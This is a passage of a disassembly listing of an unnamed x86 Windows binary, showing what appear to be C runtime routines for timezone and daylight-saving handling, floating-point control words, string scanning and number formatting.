cmp byte ptr [esi], 3Ah
jnz short loc_433BF1
inc esi
push esi
call sub_42A075
pop ecx
mov ecx, dword_453B24
add ecx, eax
mov dword_453B24, ecx
loc_433BE4: ; CODE XREF: sub_4339B6+239�j
mov al, [esi]
cmp al, bl
jl short loc_433BF1
cmp al, 39h
jg short loc_433BF1
inc esi
jmp short loc_433BE4
; ---------------------------------------------------------------------------
loc_433BF1: ; CODE XREF: sub_4339B6+1EB�j
; sub_4339B6+216�j ...
cmp [ebp+var_8], 0
jz short loc_433BFF
neg ecx
mov dword_453B24, ecx
loc_433BFF: ; CODE XREF: sub_4339B6+23F�j
movsx eax, byte ptr [esi]
test eax, eax
mov dword_453B28, eax
jz short loc_433C27
push 3
push esi
push off_453BB4
call sub_429D10
mov eax, off_453BB4
add esp, 0Ch
and byte ptr [eax+3], 0
jmp short loc_433C38
; ---------------------------------------------------------------------------
loc_433C27: ; CODE XREF: sub_4339B6+121�j
; sub_4339B6+12A�j ...
mov eax, off_453BB4
and byte ptr [eax], 0
jmp short loc_433C38
; ---------------------------------------------------------------------------
loc_433C31: ; CODE XREF: sub_4339B6+141�j
; sub_4339B6+15B�j ...
push edi
call sub_42DB50
pop ecx
loc_433C38: ; CODE XREF: sub_4339B6+57�j
; sub_4339B6+139�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4339B6 endp
; =============== S U B R O U T I N E =======================================
sub_433C3D proc near ; CODE XREF: sub_43046C+A5�p
arg_0 = dword ptr 4
push esi
push 0Bh
call sub_42DAEF
push [esp+8+arg_0]
call sub_433C5E
push 0Bh
mov esi, eax
call sub_42DB50
add esp, 0Ch
mov eax, esi
pop esi
retn
sub_433C3D endp
; =============== S U B R O U T I N E =======================================
sub_433C5E proc near ; CODE XREF: sub_433C3D+C�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
xor edi, edi
cmp dword_453B28, edi
jnz short loc_433C72
loc_433C6B: ; CODE XREF: sub_433C5E+148�j
; sub_433C5E+150�j ...
xor eax, eax
jmp loc_433DBE
; ---------------------------------------------------------------------------
loc_433C72: ; CODE XREF: sub_433C5E+B�j
mov esi, [esp+0Ch+arg_0]
push 1
pop ebx
mov eax, [esi+14h]
cmp eax, dword_453BB8
jnz short loc_433C90
cmp eax, dword_453BC8
jz loc_433D92
loc_433C90: ; CODE XREF: sub_433C5E+24�j
cmp dword_676B38, edi
jz loc_433D68
movzx ecx, word_676BE6
push ecx
cmp word_676BD8, di
movzx ecx, word_676BE4
push ecx
movzx ecx, word_676BE2
push ecx
movzx ecx, word_676BE0
push ecx
jnz short loc_433CE2
movzx ecx, word_676BDC
push edi
push ecx
movzx ecx, word_676BDE
push ecx
movzx ecx, word_676BDA
push ecx
push eax
push ebx
jmp short loc_433CF6
; ---------------------------------------------------------------------------
loc_433CE2: ; CODE XREF: sub_433C5E+65�j
movzx ecx, word_676BDE
push ecx
push edi
movzx ecx, word_676BDA
push edi
push ecx
push eax
push edi
loc_433CF6: ; CODE XREF: sub_433C5E+82�j
push ebx
call sub_433E0A
movzx eax, word_676B92
add esp, 2Ch
cmp word_676B84, di
push eax
movzx eax, word_676B90
push eax
movzx eax, word_676B8E
push eax
movzx eax, word_676B8C
push eax
jnz short loc_433D50
movzx eax, word_676B88
push edi
push eax
movzx eax, word_676B8A
push eax
movzx eax, word_676B86
push eax
push dword ptr [esi+14h]
push ebx
loc_433D45: ; CODE XREF: sub_433C5E+108�j
push edi
call sub_433E0A
add esp, 2Ch
jmp short loc_433D92
; ---------------------------------------------------------------------------
loc_433D50: ; CODE XREF: sub_433C5E+C8�j
movzx eax, word_676B8A
push eax
push edi
movzx eax, word_676B86
push edi
push eax
push dword ptr [esi+14h]
push edi
jmp short loc_433D45
; ---------------------------------------------------------------------------
loc_433D68: ; CODE XREF: sub_433C5E+38�j
push edi
push edi
push edi
push 2
push edi
push edi
push ebx
push 4
push eax
push ebx
push ebx
call sub_433E0A
push edi
push edi
push edi
push 2
push edi
push edi
push 5
push 0Ah
push dword ptr [esi+14h]
push ebx
push edi
call sub_433E0A
add esp, 58h
loc_433D92: ; CODE XREF: sub_433C5E+2C�j
; sub_433C5E+F0�j
mov edx, dword_453BBC
mov eax, dword_453BCC
mov ecx, [esi+1Ch]
cmp edx, eax
jge short loc_433DC2
cmp ecx, edx
jl loc_433C6B
cmp ecx, eax
jg loc_433C6B
cmp ecx, edx
jle short loc_433DD6
cmp ecx, eax
jge short loc_433DD6
loc_433DBC: ; CODE XREF: sub_433C5E+166�j
; sub_433C5E+16A�j
mov eax, ebx
loc_433DBE: ; CODE XREF: sub_433C5E+F�j
; sub_433C5E+19D�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_433DC2: ; CODE XREF: sub_433C5E+144�j
cmp ecx, eax
jl short loc_433DBC
cmp ecx, edx
jg short loc_433DBC
cmp ecx, eax
jle short loc_433DD6
cmp ecx, edx
jl loc_433C6B
loc_433DD6: ; CODE XREF: sub_433C5E+158�j
; sub_433C5E+15C�j ...
mov eax, [esi+8]
imul eax, 3Ch
add eax, [esi+4]
imul eax, 3Ch
add eax, [esi]
imul eax, 3E8h
cmp ecx, edx
jnz short loc_433DFD
xor ecx, ecx
cmp eax, dword_453BC0
setnl cl
loc_433DF9: ; CODE XREF: sub_433C5E+1AA�j
mov eax, ecx
jmp short loc_433DBE
; ---------------------------------------------------------------------------
loc_433DFD: ; CODE XREF: sub_433C5E+18E�j
xor ecx, ecx
cmp eax, dword_453BD0
setl cl
jmp short loc_433DF9
sub_433C5E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_433E0A proc near ; CODE XREF: sub_433C5E+99�p
; sub_433C5E+E8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 1
push ebx
mov ebx, [ebp+arg_8]
push esi
jnz loc_433EA5
mov eax, [ebp+arg_C]
mov [ebp+arg_8], ebx
and [ebp+arg_8], 3
mov esi, eax
jnz short loc_433E35
shl esi, 2
mov eax, dword_453BD0[esi]
jmp short loc_433E3E
; ---------------------------------------------------------------------------
loc_433E35: ; CODE XREF: sub_433E0A+1E�j
shl esi, 2
mov eax, dword_453C04[esi]
loc_433E3E: ; CODE XREF: sub_433E0A+29�j
mov edx, ebx
lea ecx, [eax+1]
imul edx, 16Dh
lea eax, [ebx-1]
push edi
sar eax, 2
mov edi, ecx
push 7
add edi, eax
lea eax, [edx+edi-63DBh]
pop edi
cdq
idiv edi
mov eax, [ebp+arg_10]
pop edi
cmp edx, [ebp+arg_14]
jg short loc_433E78
imul eax, 7
sub eax, edx
add eax, [ebp+arg_14]
lea ecx, [ecx+eax-7]
jmp short loc_433E82
; ---------------------------------------------------------------------------
loc_433E78: ; CODE XREF: sub_433E0A+5E�j
imul eax, 7
sub eax, edx
add eax, [ebp+arg_14]
add ecx, eax
loc_433E82: ; CODE XREF: sub_433E0A+6C�j
cmp [ebp+arg_10], 5
jnz short loc_433EC0
cmp [ebp+arg_8], 0
jnz short loc_433E96
mov esi, dword_453BD4[esi]
jmp short loc_433E9C
; ---------------------------------------------------------------------------
loc_433E96: ; CODE XREF: sub_433E0A+82�j
mov esi, dword_453C08[esi]
loc_433E9C: ; CODE XREF: sub_433E0A+8A�j
cmp ecx, esi
jle short loc_433EC0
sub ecx, 7
jmp short loc_433EC0
; ---------------------------------------------------------------------------
loc_433EA5: ; CODE XREF: sub_433E0A+C�j
mov eax, [ebp+arg_C]
test bl, 3
jnz short loc_433EB6
mov ecx, dword_453BD0[eax*4]
jmp short loc_433EBD
; ---------------------------------------------------------------------------
loc_433EB6: ; CODE XREF: sub_433E0A+A1�j
mov ecx, dword_453C04[eax*4]
loc_433EBD: ; CODE XREF: sub_433E0A+AA�j
add ecx, [ebp+arg_18]
loc_433EC0: ; CODE XREF: sub_433E0A+7C�j
; sub_433E0A+94�j ...
cmp [ebp+arg_0], 1
jnz short loc_433EF1
mov eax, [ebp+arg_1C]
mov dword_453BBC, ecx
imul eax, 3Ch
add eax, [ebp+arg_20]
mov dword_453BB8, ebx
imul eax, 3Ch
add eax, [ebp+arg_24]
imul eax, 3E8h
add eax, [ebp+arg_28]
mov dword_453BC0, eax
jmp short loc_433F46
; ---------------------------------------------------------------------------
loc_433EF1: ; CODE XREF: sub_433E0A+BA�j
mov eax, [ebp+arg_1C]
mov dword_453BCC, ecx
imul eax, 3Ch
add eax, [ebp+arg_20]
imul eax, 3Ch
add eax, dword_453B2C
add eax, [ebp+arg_24]
imul eax, 3E8h
add eax, [ebp+arg_28]
mov dword_453BD0, eax
jns short loc_433F29
add eax, 5265C00h
dec ecx
mov dword_453BD0, eax
jmp short loc_433F3A
; ---------------------------------------------------------------------------
loc_433F29: ; CODE XREF: sub_433E0A+110�j
mov edx, 5265C00h
cmp eax, edx
jl short loc_433F40
sub eax, edx
inc ecx
mov dword_453BD0, eax
loc_433F3A: ; CODE XREF: sub_433E0A+11D�j
mov dword_453BCC, ecx
loc_433F40: ; CODE XREF: sub_433E0A+126�j
mov dword_453BC8, ebx
loc_433F46: ; CODE XREF: sub_433E0A+E5�j
pop esi
pop ebx
pop ebp
retn
sub_433E0A endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
mov edx, [ebp+0Ch]
lea ecx, [ecx+0]
loc_433F64: ; CODE XREF: .text:00433F6F�j
mov al, [edx]
or al, al
jz short loc_433F71
inc edx
bts [esp], eax
jmp short loc_433F64
; ---------------------------------------------------------------------------
loc_433F71: ; CODE XREF: .text:00433F68�j
mov esi, [ebp+8]
or ecx, 0FFFFFFFFh
nop
loc_433F78: ; CODE XREF: .text:00433F84�j
inc ecx
mov al, [esi]
or al, al
jz short loc_433F86
inc esi
bt [esp], eax
jnb short loc_433F78
loc_433F86: ; CODE XREF: .text:00433F7D�j
mov eax, ecx
add esp, 20h
pop esi
leave
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
mov edx, [ebp+0Ch]
lea ecx, [ecx+0]
loc_433FA4: ; CODE XREF: .text:00433FAF�j
mov al, [edx]
or al, al
jz short loc_433FB1
inc edx
bts [esp], eax
jmp short loc_433FA4
; ---------------------------------------------------------------------------
loc_433FB1: ; CODE XREF: .text:00433FA8�j
mov esi, [ebp+8]
loc_433FB4: ; CODE XREF: .text:00433FBF�j
mov al, [esi]
or al, al
jz short loc_433FC4
inc esi
bt [esp], eax
jnb short loc_433FB4
lea eax, [esi-1]
loc_433FC4: ; CODE XREF: .text:00433FB8�j
add esp, 20h
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_433FCA proc near ; CODE XREF: sub_433FFF+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
fstcw word ptr [ebp+var_4]
push [ebp+var_4]
call sub_434015
mov esi, eax
mov eax, [ebp+arg_4]
not eax
and esi, eax
mov eax, [ebp+arg_0]
and eax, [ebp+arg_4]
or esi, eax
push esi
call sub_4340A7
pop ecx
mov [ebp+arg_4], eax
pop ecx
fldcw word ptr [ebp+arg_4]
mov eax, esi
pop esi
leave
retn
sub_433FCA endp
; =============== S U B R O U T I N E =======================================
sub_433FFF proc near ; CODE XREF: sub_430668+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
and eax, 0FFF7FFFFh
push eax
push [esp+4+arg_0]
call sub_433FCA
pop ecx
pop ecx
retn
sub_433FFF endp
; =============== S U B R O U T I N E =======================================
sub_434015 proc near ; CODE XREF: sub_433FCA+C�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
xor eax, eax
push ebp
test bl, 1
push edi
jz short loc_434026
push 10h
pop eax
loc_434026: ; CODE XREF: sub_434015+C�j
test bl, 4
jz short loc_43402D
or al, 8
loc_43402D: ; CODE XREF: sub_434015+14�j
test bl, 8
jz short loc_434034
or al, 4
loc_434034: ; CODE XREF: sub_434015+1B�j
test bl, 10h
jz short loc_43403B
or al, 2
loc_43403B: ; CODE XREF: sub_434015+22�j
test bl, 20h
jz short loc_434042
or al, 1
loc_434042: ; CODE XREF: sub_434015+29�j
test bl, 2
jz short loc_43404C
or eax, 80000h
loc_43404C: ; CODE XREF: sub_434015+30�j
movzx ecx, bx
push esi
mov edx, ecx
mov esi, 0C00h
mov edi, 300h
and edx, esi
mov ebp, 200h
jz short loc_434084
cmp edx, 400h
jz short loc_434081
cmp edx, 800h
jz short loc_43407D
cmp edx, esi
jnz short loc_434084
or eax, edi
jmp short loc_434084
; ---------------------------------------------------------------------------
loc_43407D: ; CODE XREF: sub_434015+5E�j
or eax, ebp
jmp short loc_434084
; ---------------------------------------------------------------------------
loc_434081: ; CODE XREF: sub_434015+56�j
or ah, 1
loc_434084: ; CODE XREF: sub_434015+4E�j
; sub_434015+62�j ...
and ecx, edi
pop esi
jz short loc_434094
cmp ecx, ebp
jnz short loc_434099
or eax, 10000h
jmp short loc_434099
; ---------------------------------------------------------------------------
loc_434094: ; CODE XREF: sub_434015+72�j
or eax, 20000h
loc_434099: ; CODE XREF: sub_434015+76�j
; sub_434015+7D�j
pop edi
pop ebp
test bh, 10h
pop ebx
jz short locret_4340A6
or eax, 40000h
locret_4340A6: ; CODE XREF: sub_434015+8A�j
retn
sub_434015 endp
; =============== S U B R O U T I N E =======================================
sub_4340A7 proc near ; CODE XREF: sub_433FCA+23�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
xor eax, eax
push esi
test bl, 10h
jz short loc_4340B7
push 1
pop eax
loc_4340B7: ; CODE XREF: sub_4340A7+B�j
test bl, 8
jz short loc_4340BE
or al, 4
loc_4340BE: ; CODE XREF: sub_4340A7+13�j
test bl, 4
jz short loc_4340C5
or al, 8
loc_4340C5: ; CODE XREF: sub_4340A7+1A�j
test bl, 2
jz short loc_4340CC
or al, 10h
loc_4340CC: ; CODE XREF: sub_4340A7+21�j
test bl, 1
jz short loc_4340D3
or al, 20h
loc_4340D3: ; CODE XREF: sub_4340A7+28�j
test ebx, 80000h
jz short loc_4340DD
or al, 2
loc_4340DD: ; CODE XREF: sub_4340A7+32�j
mov ecx, ebx
mov edx, 300h
and ecx, edx
mov esi, 200h
jz short loc_43410A
cmp ecx, 100h
jz short loc_434107
cmp ecx, esi
jz short loc_434102
cmp ecx, edx
jnz short loc_43410A
or ah, 0Ch
jmp short loc_43410A
; ---------------------------------------------------------------------------
loc_434102: ; CODE XREF: sub_4340A7+50�j
or ah, 8
jmp short loc_43410A
; ---------------------------------------------------------------------------
loc_434107: ; CODE XREF: sub_4340A7+4C�j
or ah, 4
loc_43410A: ; CODE XREF: sub_4340A7+44�j
; sub_4340A7+54�j ...
mov ecx, ebx
and ecx, 30000h
jz short loc_434120
cmp ecx, 10000h
jnz short loc_434122
or eax, esi
jmp short loc_434122
; ---------------------------------------------------------------------------
loc_434120: ; CODE XREF: sub_4340A7+6B�j
or eax, edx
loc_434122: ; CODE XREF: sub_4340A7+73�j
; sub_4340A7+77�j
pop esi
test ebx, 40000h
pop ebx
jz short locret_43412F
or ah, 10h
locret_43412F: ; CODE XREF: sub_4340A7+83�j
retn
sub_4340A7 endp
; =============== S U B R O U T I N E =======================================
sub_434130 proc near ; CODE XREF: sub_4341CF+48�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
push 20h
cdq
pop ecx
idiv ecx
push 1Fh
mov esi, eax
mov eax, [esp+8+arg_4]
cdq
idiv ecx
pop ecx
mov eax, [esp+4+arg_0]
sub ecx, edx
or edx, 0FFFFFFFFh
shl edx, cl
not edx
test [eax+esi*4], edx
jnz short loc_434175
inc esi
cmp esi, 3
jge short loc_434170
lea eax, [eax+esi*4]
loc_434162: ; CODE XREF: sub_434130+3E�j
cmp dword ptr [eax], 0
jnz short loc_434175
inc esi
add eax, 4
cmp esi, 3
jl short loc_434162
loc_434170: ; CODE XREF: sub_434130+2D�j
push 1
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_434175: ; CODE XREF: sub_434130+27�j
; sub_434130+35�j
xor eax, eax
pop esi
retn
sub_434130 endp
; =============== S U B R O U T I N E =======================================
sub_434179 proc near ; CODE XREF: sub_4341CF+57�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push ebx
push esi
push edi
push 20h
mov ebx, [esp+10h+arg_0]
cdq
pop ecx
idiv ecx
mov esi, eax
mov eax, [esp+0Ch+arg_4]
cdq
idiv ecx
lea edi, [ebx+esi*4]
push edi
push 1Fh
pop ecx
push 1
pop eax
sub ecx, edx
shl eax, cl
push eax
push dword ptr [edi]
call sub_4351E0
add esp, 0Ch
dec esi
js short loc_4341CB
lea edi, [ebx+esi*4]
loc_4341B2: ; CODE XREF: sub_434179+50�j
test eax, eax
jz short loc_4341CB
push edi
push 1
push dword ptr [edi]
call sub_4351E0
add esp, 0Ch
dec esi
sub edi, 4
test esi, esi
jge short loc_4341B2
loc_4341CB: ; CODE XREF: sub_434179+34�j
; sub_434179+3B�j
pop edi
pop esi
pop ebx
retn
sub_434179 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4341CF proc near ; CODE XREF: sub_43432A+81�p
; sub_43432A+CC�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
lea edi, [eax-1]
push 20h
pop ecx
and [ebp+var_4], 0
lea ebx, [edi+1]
push 20h
mov eax, ebx
pop esi
cdq
idiv ecx
push 1Fh
mov ecx, eax
mov eax, ebx
cdq
idiv esi
mov eax, [ebp+arg_0]
pop esi
push 1
mov [ebp+var_8], ecx
lea eax, [eax+ecx*4]
mov [ebp+arg_4], eax
sub esi, edx
pop edx
mov ecx, esi
shl edx, cl
test [eax], edx
jz short loc_434233
inc ebx
push ebx
push [ebp+arg_0]
call sub_434130
pop ecx
test eax, eax
pop ecx
jnz short loc_434230
push edi
push [ebp+arg_0]
call sub_434179
pop ecx
mov [ebp+var_4], eax
pop ecx
loc_434230: ; CODE XREF: sub_4341CF+51�j
mov eax, [ebp+arg_4]
loc_434233: ; CODE XREF: sub_4341CF+41�j
or edx, 0FFFFFFFFh
mov ecx, esi
shl edx, cl
push 3
pop ecx
and [eax], edx
mov eax, [ebp+var_8]
inc eax
cmp eax, ecx
jge short loc_434253
mov edx, [ebp+arg_0]
sub ecx, eax
lea edi, [edx+eax*4]
xor eax, eax
rep stosd
loc_434253: ; CODE XREF: sub_4341CF+76�j
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_4341CF endp
; =============== S U B R O U T I N E =======================================
sub_43425B proc near ; CODE XREF: sub_43432A+75�p
; sub_43432A+B6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov ecx, [esp+arg_0]
push esi
push 3
sub ecx, eax
pop edx
loc_434269: ; CODE XREF: sub_43425B+17�j
mov esi, [eax]
mov [ecx+eax], esi
add eax, 4
dec edx
jnz short loc_434269
pop esi
retn
sub_43425B endp
; =============== S U B R O U T I N E =======================================
sub_434276 proc near ; CODE XREF: sub_43432A+5F�p
; sub_43432A+9E�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
xor eax, eax
stosd
stosd
stosd
pop edi
retn
sub_434276 endp
; =============== S U B R O U T I N E =======================================
sub_434282 proc near ; CODE XREF: sub_43432A+4D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
loc_434288: ; CODE XREF: sub_434282+12�j
cmp dword ptr [eax], 0
jnz short loc_43429A
inc ecx
add eax, 4
cmp ecx, 3
jl short loc_434288
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_43429A: ; CODE XREF: sub_434282+9�j
xor eax, eax
retn
sub_434282 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43429D proc near ; CODE XREF: sub_43432A+C0�p
; sub_43432A+DA�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
push 20h
mov edi, [ebp+arg_0]
pop ebx
or esi, 0FFFFFFFFh
cdq
mov ecx, ebx
mov [ebp+var_4], 3
idiv ecx
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
cdq
idiv ecx
and [ebp+arg_4], 0
mov ecx, edx
shl esi, cl
sub ebx, edx
not esi
loc_4342D3: ; CODE XREF: sub_43429D+58�j
mov eax, [edi]
mov ecx, eax
and ecx, esi
mov [ebp+var_8], ecx
mov ecx, edx
shr eax, cl
or eax, [ebp+arg_4]
mov [edi], eax
mov eax, [ebp+var_8]
mov ecx, ebx
add edi, 4
shl eax, cl
dec [ebp+var_4]
mov [ebp+arg_4], eax
jnz short loc_4342D3
mov edi, [ebp+var_C]
push 2
pop ebx
mov esi, edi
push 8
pop ecx
shl esi, 2
loc_434305: ; CODE XREF: sub_43429D+86�j
cmp ebx, edi
jl short loc_434318
mov edx, [ebp+arg_0]
mov eax, ecx
sub eax, esi
mov eax, [eax+edx]
mov [ecx+edx], eax
jmp short loc_43431F
; ---------------------------------------------------------------------------
loc_434318: ; CODE XREF: sub_43429D+6A�j
mov eax, [ebp+arg_0]
and dword ptr [ecx+eax], 0
loc_43431F: ; CODE XREF: sub_43429D+79�j
dec ebx
sub ecx, 4
jns short loc_434305
pop edi
pop esi
pop ebx
leave
retn
sub_43429D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43432A proc near ; CODE XREF: sub_434496+D�p
; sub_4344AC+D�p
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
movzx ecx, word ptr [eax+0Ah]
mov ebx, ecx
and ecx, 8000h
mov [ebp+arg_0], ecx
mov ecx, [eax+6]
mov [ebp+var_C], ecx
mov ecx, [eax+2]
movzx eax, word ptr [eax]
mov edi, [ebp+arg_8]
and ebx, 7FFFh
sub ebx, 3FFFh
mov [ebp+var_8], ecx
shl eax, 10h
cmp ebx, 0FFFFC001h
mov [ebp+var_4], eax
jnz short loc_434397
lea eax, [ebp+var_C]
xor esi, esi
push eax
call sub_434282
test eax, eax
pop ecx
jnz loc_434456
lea eax, [ebp+var_C]
push eax
call sub_434276
pop ecx
loc_43438F: ; CODE XREF: sub_43432A+E4�j
push 2
loc_434391: ; CODE XREF: sub_43432A+110�j
pop eax
jmp loc_434458
; ---------------------------------------------------------------------------
loc_434397: ; CODE XREF: sub_43432A+45�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_18]
push eax
call sub_43425B
push dword ptr [edi+8]
lea eax, [ebp+var_C]
push eax
call sub_4341CF
add esp, 10h
test eax, eax
jz short loc_4343B8
inc ebx
loc_4343B8: ; CODE XREF: sub_43432A+8B�j
mov eax, [edi+4]
mov ecx, eax
sub ecx, [edi+8]
cmp ebx, ecx
jge short loc_4343D0
lea eax, [ebp+var_C]
push eax
call sub_434276
pop ecx
jmp short loc_43440C
; ---------------------------------------------------------------------------
loc_4343D0: ; CODE XREF: sub_43432A+98�j
cmp ebx, eax
jg short loc_434413
sub eax, ebx
mov esi, eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_C]
push eax
call sub_43425B
lea eax, [ebp+var_C]
push esi
push eax
call sub_43429D
push dword ptr [edi+8]
lea eax, [ebp+var_C]
push eax
call sub_4341CF
mov eax, [edi+0Ch]
inc eax
push eax
lea eax, [ebp+var_C]
push eax
call sub_43429D
add esp, 20h
loc_43440C: ; CODE XREF: sub_43432A+A4�j
xor esi, esi
jmp loc_43438F
; ---------------------------------------------------------------------------
loc_434413: ; CODE XREF: sub_43432A+A8�j
cmp ebx, [edi]
jl short loc_43443F
lea eax, [ebp+var_C]
push eax
call sub_434276
push dword ptr [edi+0Ch]
or byte ptr [ebp+var_C+3], 80h
lea eax, [ebp+var_C]
push eax
call sub_43429D
mov esi, [edi+14h]
add esp, 0Ch
add esi, [edi]
push 1
jmp loc_434391
; ---------------------------------------------------------------------------
loc_43443F: ; CODE XREF: sub_43432A+EB�j
push dword ptr [edi+0Ch]
mov esi, [edi+14h]
and byte ptr [ebp+var_C+3], 7Fh
lea eax, [ebp+var_C]
push eax
add esi, ebx
call sub_43429D
pop ecx
pop ecx
loc_434456: ; CODE XREF: sub_43432A+55�j
xor eax, eax
loc_434458: ; CODE XREF: sub_43432A+68�j
push 1Fh
pop ecx
sub ecx, [edi+0Ch]
mov edi, [edi+10h]
shl esi, cl
mov ecx, [ebp+arg_0]
neg ecx
sbb ecx, ecx
and ecx, 80000000h
or esi, ecx
or esi, [ebp+var_C]
cmp edi, 40h
jnz short loc_434487
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_8]
mov [ecx+4], esi
mov [ecx], edx
jmp short loc_434491
; ---------------------------------------------------------------------------
loc_434487: ; CODE XREF: sub_43432A+14E�j
cmp edi, 20h
jnz short loc_434491
mov ecx, [ebp+arg_4]
mov [ecx], esi
loc_434491: ; CODE XREF: sub_43432A+15B�j
; sub_43432A+160�j
pop edi
pop esi
pop ebx
leave
retn
sub_43432A endp
; =============== S U B R O U T I N E =======================================
sub_434496 proc near ; CODE XREF: sub_4344C2+23�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_453C40
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_43432A
add esp, 0Ch
retn
sub_434496 endp
; =============== S U B R O U T I N E =======================================
sub_4344AC proc near ; CODE XREF: sub_4344EF+23�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_453C58
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_43432A
add esp, 0Ch
retn
sub_4344AC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4344C2 proc near ; CODE XREF: sub_4307A1+12�p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_C]
push eax
call sub_435381
push [ebp+arg_0]
lea eax, [ebp+var_C]
push eax
call sub_434496
add esp, 24h
leave
retn
sub_4344C2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4344EF proc near ; CODE XREF: sub_4307A1+2D�p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_C]
push eax
call sub_435381
push [ebp+arg_0]
lea eax, [ebp+var_C]
push eax
call sub_4344AC
add esp, 24h
leave
retn
sub_4344EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43451C proc near ; CODE XREF: sub_4307DF+41�p
; sub_430902+38�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov edx, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov ecx, [edx+0Ch]
push edi
lea edi, [esi+1]
mov byte ptr [esi], 30h
test ebx, ebx
mov eax, edi
jle short loc_434559
mov [ebp+arg_0], ebx
xor ebx, ebx
loc_43453F: ; CODE XREF: sub_43451C+38�j
mov dl, [ecx]
test dl, dl
jz short loc_43454B
movsx edx, dl
inc ecx
jmp short loc_43454E
; ---------------------------------------------------------------------------
loc_43454B: ; CODE XREF: sub_43451C+27�j
push 30h
pop edx
loc_43454E: ; CODE XREF: sub_43451C+2D�j
mov [eax], dl
inc eax
dec [ebp+arg_0]
jnz short loc_43453F
mov edx, [ebp+arg_8]
loc_434559: ; CODE XREF: sub_43451C+1C�j
and byte ptr [eax], 0
test ebx, ebx
jl short loc_434572
cmp byte ptr [ecx], 35h
jl short loc_434572
loc_434565: ; CODE XREF: sub_43451C+52�j
dec eax
cmp byte ptr [eax], 39h
jnz short loc_434570
mov byte ptr [eax], 30h
jmp short loc_434565
; ---------------------------------------------------------------------------
loc_434570: ; CODE XREF: sub_43451C+4D�j
inc byte ptr [eax]
loc_434572: ; CODE XREF: sub_43451C+42�j
; sub_43451C+47�j
cmp byte ptr [esi], 31h
jnz short loc_43457C
inc dword ptr [edx+4]
jmp short loc_43458E
; ---------------------------------------------------------------------------
loc_43457C: ; CODE XREF: sub_43451C+59�j
push edi
call sub_4293A0
inc eax
push eax
push edi
push esi
call sub_42BA90
add esp, 10h
loc_43458E: ; CODE XREF: sub_43451C+5E�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_43451C endp
; =============== S U B R O U T I N E =======================================
